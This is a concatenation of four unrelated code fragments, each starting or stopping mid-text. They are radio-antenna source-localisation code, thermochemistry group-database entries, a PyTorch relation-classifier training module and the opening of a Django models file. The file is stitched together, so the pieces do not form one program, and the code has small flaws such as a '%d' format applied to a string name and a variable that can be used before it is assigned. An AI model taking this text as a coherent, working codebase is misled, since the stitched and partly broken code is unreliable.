stage_2_result, s2_itternum, num_stage2_itters = stochastic_minimizer(self.stage_2_imager.intensity_ABSbefore , BB, converg_num=5, test_spot=previous_solution.x,
converg_rad=self.stage_2_convergence_length, max_itters=self.stage_2_max_stoch_itters, options={'maxiter':1000})
stage_2_result.x[2] = np.abs(stage_2_result.x[2]) ## ensure Z is positive
D = np.linalg.norm( stage_2_result.x - previous_solution.x )
log_func(" s2 itter: {:2d} {:4.4f} {:d}".format(stage2loop_i, -stage_2_result.fun, int(D)) )
if D < self.stage_2_convergence_length:
converged = True
break
elif D > self.stage_2_break_length:
converged = False
break
previous_solution = stage_2_result
if problem:
continue
new_stage_1_result = minimize(self.stage_1_imager.intensity, stage_2_result.x, method="Nelder-Mead", options={'maxiter':1000})
log_func(" old S1: {:4.2f} new SH1: {:4.2f}".format(-stage_1_result.fun, -new_stage_1_result.fun) )
if stage_1_result.fun < new_stage_1_result.fun:
S1_S2_distance = np.linalg.norm(stage_1_result.x-stage_2_result.x)
else:
S1_S2_distance = np.linalg.norm(new_stage_1_result.x-stage_2_result.x)
log_func(" loc: {:d} {:d} {:d}".format(int(stage_2_result.x[0]), int(stage_2_result.x[1]), int(stage_2_result.x[2])) )
log_func(" S1-S2 distance: {:d} converged: {} ".format( int(S1_S2_distance), converged) )
log_func(" intensity: {:4.3f} amplitude: {:d} ".format( -stage_2_result.fun, int(self.hilbert_envelope_tmp[peak_loc])) )
log_func()
log_func()
## save to file ##
source_dataset = h5_groupobject.create_dataset(str(event_i), (self.num_antennas,self.pulse_length), dtype=np.complex)
source_dataset.attrs["loc"] = stage_2_result.x
source_dataset.attrs["unique_index"] = block_index*self.max_events_perBlock + event_i
source_time_s2 = (peak_loc+start_index+self.antenna_data_offsets[prefered_ant_i])*5.0E-9 - np.linalg.norm( stage_2_result.x - self.antenna_locations[ prefered_ant_i ] )/v_air
source_time_s2 -= self.prefered_station_timing_offset + self.prefered_station_antenna_timing_offsets[ self.antennas_to_use[prefered_ant_i][1] ]
source_dataset.attrs["T"] = source_time_s2
source_dataset.attrs["peak_index"] = peak_loc
source_dataset.attrs["intensity"] = -stage_2_result.fun
source_dataset.attrs["stage_1_success"] = (num_stage1_itters==self.stage_1_converg_num)
source_dataset.attrs["stage_1_num_itters"] = num_stage1_itters
source_dataset.attrs["amplitude"] = self.hilbert_envelope_tmp[peak_loc]
source_dataset.attrs["S1_S2_distance"] = S1_S2_distance
source_dataset.attrs["converged"] = converged
source_time_s1 = (peak_loc+start_index+self.antenna_data_offsets[prefered_ant_i])*5.0E-9 - np.linalg.norm( stage_1_result.x - self.antenna_locations[ prefered_ant_i ] )/v_air
source_time_s1 -= self.prefered_station_timing_offset + self.prefered_station_antenna_timing_offsets[ self.antennas_to_use[prefered_ant_i][1] ]
source_dataset.attrs["XYZT_s1"] = np.append(stage_1_result.x, [source_time_s1])
#### erase the peaks !! ####
# self.hilbert_envelope_tmp[peak_loc-int(self.pulse_length/2):peak_loc+int(self.pulse_length/2)] *= self.erasure_window
self.hilbert_envelope_tmp[peak_loc-int(self.pulse_length/2):peak_loc+int(self.pulse_length/2)] = 0.0
for ant_i in range( self.num_antennas ):
modeled_dt = -( np.linalg.norm( self.antenna_locations[ prefered_ant_i ]-stage_2_result.x ) -
np.linalg.norm( self.antenna_locations[ant_i]-stage_2_result.x ) )/v_air
modeled_dt -= self.antenna_delays[ prefered_ant_i ] - self.antenna_delays[ant_i]
modeled_dt /= 5.0E-9
modeled_dt += peak_loc
modeled_dt = int(modeled_dt)
source_dataset[ant_i] = self.data_block[ant_i, modeled_dt-int(self.pulse_length/2):modeled_dt+int(self.pulse_length/2)]
if converged and self.erase_pulses:
self.data_block[ant_i, modeled_dt-int(self.pulse_length/2):modeled_dt+int(self.pulse_length/2)] *= self.erasure_window
def run_multiple_blocks(self, output_folder, initial_datapoint, start_block, blocks_per_run, run_number, skip_blocks_done=True, print_to_screen=True):
processed_data_folder = processed_data_dir(self.timeID)
data_dir = processed_data_folder + "/" + output_folder
if not isdir(data_dir):
mkdir(data_dir)
logging_folder = data_dir + '/logs_and_plots'
if not isdir(logging_folder):
mkdir(logging_folder)
file_number = 0
while True:
fname = logging_folder + "/log_run_"+str(file_number)+".txt"
if isfile(fname) :
file_number += 1
else:
break
logger_function = logger()
logger_function.set( fname, print_to_screen )
logger_function.take_stdout()
logger_function.take_stderr()
#### TODO!#### improve log all options
logger_function("timeID:", self.timeID)
logger_function("date and time run:", time.strftime("%c") )
| |
Cd u0 {1,S} {7,D}
5 Cs u0 {1,S}
6 Cdd u0 {3,D}
7 Cdd u0 {4,D}
8 O2d u0 {2,D}
""",
thermo = u'Cs-(Cds-O2d)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 576,
label = "Cs-(Cds-O2d)(Cds-Cdd-O2d)(Cds-Cdd-O2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 CO u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 O2d u0 {4,D}
9 O2d u0 {5,D}
10 O2d u0 {6,D}
""",
thermo = u'Cs-(Cds-Cdd-O2d)(Cds-Cdd-O2d)CsCs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 577,
label = "Cs-(Cds-O2d)(Cds-Cdd-O2d)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 CO u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 O2d u0 {4,D}
9 O2d u0 {5,D}
10 C u0 {6,D}
""",
thermo = u'Cs-(Cds-O2d)(Cds-Cdd-O2d)(Cds-Cds)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 578,
label = "Cs-(Cds-O2d)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 CO u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 O2d u0 {4,D}
9 C u0 {5,D}
10 C u0 {6,D}
""",
thermo = u'Cs-(Cds-O2d)(Cds-Cds)(Cds-Cds)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 579,
label = "Cs-(Cds-Cd)(Cds-Cd)(Cds-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {5,S}
2 Cd u0 {1,S} {6,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cs u0 {1,S}
6 C u0 {2,D}
7 C u0 {3,D}
8 C u0 {4,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cds)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 580,
label = "Cs-(Cds-Cds)(Cds-Cds)(Cds-Cds)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {5,S}
2 Cd u0 {1,S} {6,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cs u0 {1,S}
6 Cd u0 {2,D}
7 Cd u0 {3,D}
8 Cd u0 {4,D}
""",
thermo = ThermoData(
Tdata = ([300,400,500,600,800,1000,1500],'K'),
Cpdata = ([3.32,5.86,7.57,8.54,9.22,9.36,8.45],'cal/(mol*K)','+|-',[0.13,0.13,0.13,0.13,0.13,0.13,0.13]),
H298 = (2.54,'kcal/mol','+|-',0.26),
S298 = (-33.96,'cal/(mol*K)','+|-',0.13),
),
shortDesc = u"""Cs-CdCdCdCs BOZZELLI =3D Cs/Cs2/Cd2 + (Cs/Cs3/Cd - Cs/Cs4)""",
longDesc =
u"""
""",
)
entry(
index = 581,
label = "Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {5,S}
2 Cd u0 {1,S} {6,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cs u0 {1,S}
6 Cd u0 {2,D}
7 Cd u0 {3,D}
8 Cdd u0 {4,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-Cd)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 582,
label = "Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-O2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {6,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cs u0 {1,S}
7 Cd u0 {3,D}
8 Cd u0 {4,D}
9 O2d u0 {5,D}
""",
thermo = u'Cs-(Cds-Cdd-O2d)CsCsCs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-S2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {6,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cs u0 {1,S}
7 Cd u0 {3,D}
8 Cd u0 {4,D}
9 S2d u0 {5,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 583,
label = "Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {6,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cs u0 {1,S}
7 Cd u0 {3,D}
8 Cd u0 {4,D}
9 C u0 {5,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cds)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 584,
label = "Cs-(Cds-Cds)(Cds-Cdd)(Cds-Cdd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {5,S}
2 Cd u0 {1,S} {6,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cs u0 {1,S}
6 Cd u0 {2,D}
7 Cdd u0 {3,D}
8 Cdd u0 {4,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 585,
label = "Cs-(Cds-Cds)(Cds-Cdd-O2d)(Cds-Cdd-O2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 Cd u0 {4,D}
9 O2d u0 {5,D}
10 O2d u0 {6,D}
""",
thermo = u'Cs-(Cds-Cdd-O2d)(Cds-Cdd-O2d)CsCs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 586,
label = "Cs-(Cds-Cds)(Cds-Cdd-O2d)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 Cd u0 {4,D}
9 O2d u0 {5,D}
10 C u0 {6,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-O2d)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cds)(Cds-Cdd-S2d)(Cds-Cdd-S2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 Cd u0 {4,D}
9 S2d u0 {5,D}
10 S2d u0 {6,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cds)(Cds-Cdd-S2d)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 Cd u0 {4,D}
9 S2d u0 {5,D}
10 C u0 {6,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 587,
label = "Cs-(Cds-Cds)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 Cd u0 {4,D}
9 C u0 {5,D}
10 C u0 {6,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cds)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 588,
label = "Cs-(Cds-Cdd)(Cds-Cdd)(Cds-Cdd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {5,S}
2 Cd u0 {1,S} {6,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cs u0 {1,S}
6 Cdd u0 {2,D}
7 Cdd u0 {3,D}
8 Cdd u0 {4,D}
""",
thermo = u'Cs-(Cds-Cdd-Cd)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 589,
label = "Cs-(Cds-Cdd-O2d)(Cds-Cdd-O2d)(Cds-Cdd-O2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 O2d u0 {5,D}
10 O2d u0 {6,D}
11 O2d u0 {7,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 590,
label = "Cs-(Cds-Cdd-O2d)(Cds-Cdd-O2d)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 O2d u0 {5,D}
10 O2d u0 {6,D}
11 C u0 {7,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cdd-O2d)(Cds-Cdd-O2d)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 591,
label = "Cs-(Cds-Cdd-O2d)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 O2d u0 {5,D}
10 C u0 {6,D}
11 C u0 {7,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-O2d)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cdd-S2d)(Cds-Cdd-S2d)(Cds-Cdd-S2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 S2d u0 {5,D}
10 S2d u0 {6,D}
11 S2d u0 {7,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cdd-S2d)(Cds-Cdd-S2d)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 S2d u0 {5,D}
10 S2d u0 {6,D}
11 C u0 {7,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cdd-S2d)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 S2d u0 {5,D}
10 C u0 {6,D}
11 C u0 {7,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 592,
label = "Cs-(Cds-Cdd-Cd)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs",
group =
"""
1 | |
import torch
import embrelassess.model as biclassmodel
import embrelassess.train as train
import sys
import logging
import os
import os.path as osp
import json
import math
import itertools
import pandas as pd
logger = logging.getLogger(__name__)
# The learn module provides methods for learning binary classifiers
# as well as for providing IO on the training and testing of the models
def _epochs_from_trainset_size(trainset_size):
"""Returns a sensible number of epochs for a given trainset_size
Args:
trainset_size the size of the training set (i.e. examples in 1 epoch)
Returns:
integer number of suggested epochs to train for
"""
log10 = math.log10(trainset_size/2)
order = round(log10 - 1)
inv_order = 5 - order
factor = math.pow(2, inv_order)
base = 3
return round(factor * base)
def _build_model(name='nn3', indim=600):
"""Build a pytorch binary classifier for a given input dimension
Args:
name one of 'nn1', 'nn2', 'nn3', 'logreg', 'alwaysT', 'alwaysF'
Returns:
a pytorch binary classifier model
"""
# TODO: move to embrelassess.model?
if name == 'logreg':
my_model = biclassmodel.LogisticRegression(indim)
elif name == 'nn1':
nn1 = {"layer_dims": [indim], "dropouts": [0.5]}
my_model = biclassmodel.NNBiClassifier(indim, nn1['layer_dims'],
nn1['dropouts'])
elif name == 'nn2':
if indim == 600:
nn2 = {"layer_dims": [750, 400], "dropouts": [0.5, 0.5]}
elif indim == 512:
nn2 = {"layer_dims": [700, 375], "dropouts": [0.5, 0.5]}
elif indim == 320:
nn2 = {"layer_dims": [440, 160], "dropouts": [0.5, 0.5]}
elif indim == 300:
nn2 = {"layer_dims": [400, 150], "dropouts": [0.5, 0.5]}
elif indim == 256:
nn2 = {"layer_dims": [350, 150], "dropouts": [0.5, 0.5]}
elif indim == 160:
nn2 = {"layer_dims": [220, 85], "dropouts": [0.5, 0.5]}
elif indim == 150:
nn2 = {"layer_dims": [200, 80], "dropouts": [0.5, 0.5]}
elif indim == 128:
nn2 = {"layer_dims": [175, 75], "dropouts": [0.5, 0.5]}
else:
raise Exception('Unexpected input dimension %d' % indim)
my_model = biclassmodel.NNBiClassifier(indim, nn2['layer_dims'],
nn2['dropouts'])
elif name == 'nn3':
if indim == 600:
nn3 = {"layer_dims": [750, 500, 250],
"dropouts": [0.5, 0.5, 0.5]}
elif indim == 512:
nn3 = {"layer_dims": [700, 475, 225],
"dropouts": [0.5, 0.5, 0.5]}
elif indim == 320:
nn3 = {"layer_dims": [440, 220, 110],
"dropouts": [0.5, 0.5, 0.5]}
elif indim == 300:
nn3 = {"layer_dims": [400, 200, 100],
"dropouts": [0.5, 0.5, 0.5]}
elif indim == 256:
nn3 = {"layer_dims": [350, 200, 100], "dropouts": [0.5, 0.5, 0.5]}
elif indim == 160:
nn3 = {"layer_dims": [220, 110, 80], "dropouts": [0.5, 0.5, 0.5]}
elif indim == 150:
nn3 = {"layer_dims": [200, 100, 75], "dropouts": [0.5, 0.5, 0.5]}
elif indim == 128:
nn3 = {"layer_dims": [175, 100, 50], "dropouts": [0.5, 0.5, 0.5]}
else:
raise Exception('Unexpected input dimension %d' % indim)
my_model = biclassmodel.NNBiClassifier(indim, nn3['layer_dims'],
nn3['dropouts'])
elif name == 'alwaysT':
my_model = biclassmodel.DummyBiClassifier(indim, predef=[0.01, 0.99])
elif name == 'alwaysF':
my_model = biclassmodel.DummyBiClassifier(indim, predef=[0.99, 0.01])
else:
raise Exception('Unknown model name %d' % name)
return my_model
def load_rels_meta(relpath):
"""Extracts metadata about a folder with relpair files based on the filenames
Args:
relpath the path to the folder containing the word relation data, files in
this folder must adhere to the standard naming reltype_relname__excnt.txt
Returns:
dataframe with columns 'type', 'name', 'cnt' and 'file'
"""
rels = []
for f in [f for f in os.listdir(relpath) if osp.isfile(osp.join(relpath, f))]:
prefix_end = f.find('_')
rel_end = f.find('__')
ext_start = f.find('.txt')
if ext_start < 0 or rel_end < 0 or prefix_end < 0:
continue
rel_type = f[0:prefix_end]
rel_name = f[prefix_end + 1:rel_end]
if len(rel_name) == 0:
rel_name = 'rel'
rel_ex_cnt = int(f[rel_end + 2:ext_start])
rel = {"type": rel_type, "name": rel_name, "cnt": rel_ex_cnt, "file": f}
rels.append(rel)
# print(rel)
rel_df = pd.DataFrame(rels)
return rel_df
def pair_disturber(input_batch):
bsize = input_batch.size()
assert bsize[1] % 2 == 0
distortions = torch.randn(bsize[0], int(bsize[1]/2))
distortions = torch.cat((distortions, distortions), dim=1)
return input_batch + distortions
def pair_disturber_for_vectors(vectors):
return pair_disturber_std(vectors.std())
def pair_disturber_std(std):
def _pair_disturber(input_batch):
bsize = input_batch.size()
assert bsize[1] % 2 == 0
distortions = torch.randn(bsize[0], int(bsize[1]/2))
distortions = distortions * std
distortions = torch.cat((distortions, distortions), dim=1)
return input_batch + distortions
return _pair_disturber
def learn_rels(relpath, rels_meta_df, data_loaders,
single_rel_types=[],
epochs_from_trainset_size_fn=_epochs_from_trainset_size,
rel_filter=None, models=['logreg', 'nn2', 'nn3'], n_runs=5,
train_input_disturber_for_vec=None,
debug_test_df=False,
odir_path=None,
cuda=False):
"""Trains binary classifier models to learn multiple relations
Args:
rels_meta a list of relation metadata for all the relations for which
you want to learn models
other see learn_rel arguments
Returns:
a list of learning result objects. See method learn_rel for a description
such an object.
"""
learn_results = []
tot = len(rels_meta_df)
for i, rel_meta in rels_meta_df.iterrows():
print("\n*** rel %d of %d ***\n" % (i, tot))
learn_results.append(
learn_rel(relpath, rel_meta,
data_loaders,
single_rel_types=single_rel_types,
epochs_from_trainset_size_fn=epochs_from_trainset_size_fn,
rel_filter=rel_filter, models=models, n_runs=n_runs,
train_input_disturber_for_vec=train_input_disturber_for_vec,
odir_path=odir_path,
cuda=cuda))
return learn_results
def learn_rel(relpath, rel_meta, data_loaders,
single_rel_types=[],
epochs_from_trainset_size_fn=_epochs_from_trainset_size,
epoch_list_from_epochs=lambda x: range(x),
rel_filter=None, models=['logreg', 'nn2', 'nn3'], n_runs=5,
train_input_disturber_for_vec=None,
debug_test_df=False,
odir_path=None,
cuda=False):
""" Train binary classifier models to learn a relation given a dataset
Args:
relpath path to the relation tsv files
rel_meta dict or object with metadata about the relation to learn
data_loaders dictionary of data_loader objects responsible for loading
and splitting the dataset
single_rel_types list of rel type names which are not pairs, but
single words
epochs_from_trainset_size_fn function from trainset size to number
of epochs
epoch_list_from_epochs function from an int (the number of epochs) to
a list of epochs. By default, this is imply the range(x),
but you may replace it with a tqdm to keep track of training progress.
rel_filter filter for the rel_meta to skip unwanted relations
models list of model names to train
n_runs times to train each model (to get average and stdv)
train_input_disturber function to disturb an input batch
odir_path optional path to a folder where the trained model should be stored
Returns:
An object with data summarising the learning result. It includes the
rel_name, rel_type, number of epochs trained, number of positive samples
for the relation and metrics for various models: base, best, and the
specified models. Metrics include (average and stdv for) accuracy, f1,
precision and recall.
"""
cnt = rel_meta['cnt']
rel_name = rel_meta['name']
rel_type = rel_meta['type']
empty_result = {"rel_name": rel_name, "rel_type": rel_type,
"pos_exs": cnt,
"emb_model_results": {}}
if cnt < 75:
print(rel_name, rel_type, 'too few examples')
return empty_result
if rel_filter and not rel_filter(rel_meta):
print(rel_name, rel_type, 'not in rel_name filter')
return empty_result
emb_model_results = {} # dict from 'emb name' to a list of model_results
print('Training each model %d times...' % n_runs)
for model, loader_name, run in itertools.product(
models, data_loaders, range(n_runs)):
print("run %d on model %s with vectors %s" %
(run, model, loader_name))
data_loader = data_loaders[loader_name]
fpath = osp.join(relpath, rel_meta['file'])
# load embeddings and labels
if rel_type == 'rnd2rnd':
X, Y, ds_n, ds_tc, ds_tf = data_loader.generate_random_pair_data(
target_size=cnt*2)
elif rel_type in single_rel_types:
X, Y, ds_n, ds_tc, ds_tf = data_loader.load_single_data(fpath)
else:
X, Y, ds_n, ds_tc, ds_tf = data_loader.load_pair_data(fpath)
if train_input_disturber_for_vec:
train_input_disturber = train_input_disturber_for_vec(
data_loader.vecs.vectors)
else:
train_input_disturber = None
indim = X.shape[1]
msg = 'Expecting binary classifier but found max %d min %d' % (
torch.max(Y), torch.min(Y))
assert torch.max(Y) == 1 and torch.min(Y) == 0, msg
print("\n", rel_meta['file'])
epochs = epochs_from_trainset_size_fn(X.shape[0]) # from full dataset
trainloader, validloader, testloader = data_loader.split_data(
X, Y, seed=41)
my_model = _build_model(model, indim)
if odir_path:
modrun_odir = osp.join(odir_path, rel_type, rel_name,
loader_name, model, 'run_%02d' % run)
_store_raw_model(my_model, modrun_odir)
try:
trainer = train.ModelTrainer(my_model, cuda=cuda)
pretrain_test_result = trainer.test(testloader)
trainer.train(trainloader, validloader,
epochs_list=epoch_list_from_epochs(epochs),
input_disturber=train_input_disturber)
if modrun_odir:
_store_params(trainer.model, modrun_odir)
print('Finished %d epochs of training' % epochs)
test_df = trainer.test_df(testloader, debug=debug_test_df)
test_random_result = trainer.test_random(testloader)
model_result = {"model": model, "i": run, "emb": loader_name,
"epochs": epochs, "pos_exs": cnt,
"dataset_size": ds_n,
"dataset_tok_cnt": ds_tc,
"dataset_tok_found": ds_tf,
# "trainer": trainer,
"trainer_df": trainer.df, # to plot learning curve
"pretrain_test_result": pretrain_test_result,
"test_df": test_df,
"test_random_result": test_random_result}
model_results = emb_model_results.get(loader_name, [])
model_results.append(model_result)
emb_model_results[loader_name] = model_results
except:
print("Unexpected error executing %s:" % model, sys.exc_info()[0])
raise
# del trainer # cannot delete the trainer as we need it later on
del my_model
del trainloader
del validloader
del testloader
result = {"rel_name": rel_name, "rel_type": rel_type,
"pos_exs": cnt,
"emb_model_results": emb_model_results}
return result
def store_learn_result(dir_path, learn_result):
"""Stores a learn_result in the specified dir_path
This is done by convention in subfolders
'reltype'/'rel_name'/'emb'/'model'/run_i/
Each subfolder will contain several files. See _store_embrun_result
"""
rel_path = osp.join(dir_path,
learn_result['rel_type'],
learn_result['rel_name'])
for emb in learn_result['emb_model_results']:
emb_path = osp.join(rel_path, emb)
for i, emb_result in enumerate(learn_result['emb_model_results'][emb]):
_store_embrun_result(emb_path, emb_result)
def load_learn_results(dir_path):
"""Loads all learn_results from a | |
import logging
import traceback
import decimal
import json
import numpy
import django
from django.db import models # we're going to geodjango this one - might not need it, but could make some things nicer
from django.db.models import Q
from django.contrib.auth.models import Group
from django.contrib.auth import get_user_model
User = get_user_model() # define user by this method rather than direct import - safer for the future
from guardian.shortcuts import assign_perm
from django.db.models.signals import post_save
from django.dispatch import receiver
from Waterspout import settings
import pandas
from Dapper import scenarios, get_version as get_dapper_version, worst_case
log = logging.getLogger("waterspout.models")
class SimpleJSONField(models.TextField):
"""
converts dicts to JSON strings on save and converts JSON to dicts
on load
"""
def get_prep_value(self, value):
return json.dumps(value)
def from_db_value(self, value, expression, connection):
return json.loads(value)
class UserProfile(models.Model):
"""
Basically just for user settings
"""
user = models.OneToOneField(User, related_name="profile", on_delete=models.CASCADE)
_serializer_fields = ["id", "user", "show_organization_model_runs", "show_organization_model_runs_tooltip",
"dense_tables", "dense_tables_tooltip"]
# basic settings
show_organization_model_runs = models.BooleanField(default=True)
show_organization_model_runs_tooltip = "By default, the application shows all model runs from within your organization" \
" and gives you the option to temporarily show only your model runs." \
" This setting changes that behavior so that, by default, you only see model runs" \
" that you created yourself and then you can temporarily change the listing to" \
" see all model runs in your organization."
dense_tables = models.BooleanField(default=False)
